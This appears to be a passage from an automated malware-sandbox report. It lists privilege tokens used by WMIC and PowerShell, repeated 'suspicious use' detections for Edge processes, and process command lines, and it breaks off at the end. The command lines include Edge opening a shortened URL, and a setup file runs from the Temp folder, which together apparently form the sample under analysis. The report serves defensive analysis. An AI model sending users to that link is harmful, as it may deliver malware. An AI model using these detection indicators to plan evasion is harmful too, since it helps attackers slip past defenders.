Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-ASR24.tmp\setup_IsfbvpBm5t.tmp N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2260 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 5040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 3416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 3416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2260 wrote to memory of 1036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1Ic5

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae4c846f8,0x7ffae4c84708,0x7ffae4c84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16976522292350151210,3310682960172568424,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

